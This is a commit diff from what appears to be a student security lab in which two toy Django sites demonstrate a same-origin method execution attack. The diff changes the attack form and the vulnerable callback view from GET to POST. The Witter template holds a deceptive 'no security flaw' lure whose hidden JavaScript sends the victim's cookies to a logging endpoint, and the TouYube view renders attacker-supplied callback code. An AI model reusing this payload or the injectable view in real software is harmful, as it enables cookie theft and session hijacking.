study-faraphel/M1-SR-SOME
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity

fixed Witter icon

Browse source
This commit is contained in:
Faraphel 2024-05-15 11:13:58 +02:00
parent d614b8ea26
commit 0b961c7551
3 changed files with 10 additions and 9 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
TouYube/apps/TouYube/views.py
View file

@ -5,9 +5,9 @@ from django.contrib.auth.decorators import login_required
from django.core.handlers.wsgi import WSGIRequest
from django.http import HttpResponse, HttpResponseForbidden, HttpResponseBadRequest
from django.shortcuts import render, redirect, get_object_or_404
from django.views.decorators.csrf import csrf_protect
from apps.TouYube import forms, models
from configuration import settings
def view_homepage(request: WSGIRequest) -> HttpResponse:
@ -143,11 +143,11 @@ def view_attack_some(request: WSGIRequest) -> HttpResponse:
"""
# check the method
if request.method != "GET":
if request.method != "POST":
return HttpResponseBadRequest()
# get the callback code
callback_js = request.GET["callback"]
callback_js = request.POST["callback"]
return render(
request,

2
TouYube/configuration/settings.py
View file

@ -24,7 +24,7 @@ SECRET_KEY = 'django-insecure-87uz=bnd&m+$(!qfzs3$bum)!e6pw$8gaw_^cehmuyuft5q4!#
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ENABLE_CROSS_ORIGIN_SECURITY = False
ENABLE_CROSS_ORIGIN_SECURITY = True # Enable all the CORS, XFRAME, ... securities
ALLOWED_HOSTS = []

5
Witter/apps/Witter/templates/Witter/some.html
View file

@ -4,7 +4,7 @@
{% block body %}
<h1>SOME</h1>
<form id="attack-form" action="http://localhost:8080/callback/" method="GET">
<form id="attack-form" action="http://localhost:8080/callback/" method="POST">
<input type="hidden" name="callback" value="
{# once the victim is calling the callback, send his cookies to this URL #}
fetch('http://localhost:8081/logs/', {
@ -15,9 +15,10 @@
headers: {
'Content-type': 'application/json; charset=UTF-8'
}
});
}).then(data => {
{# redirect the user to the homepage #}
document.location.href='http://localhost:8080/';
});
">
<input type="submit" value="See my TouYube account with no security flaw 😊">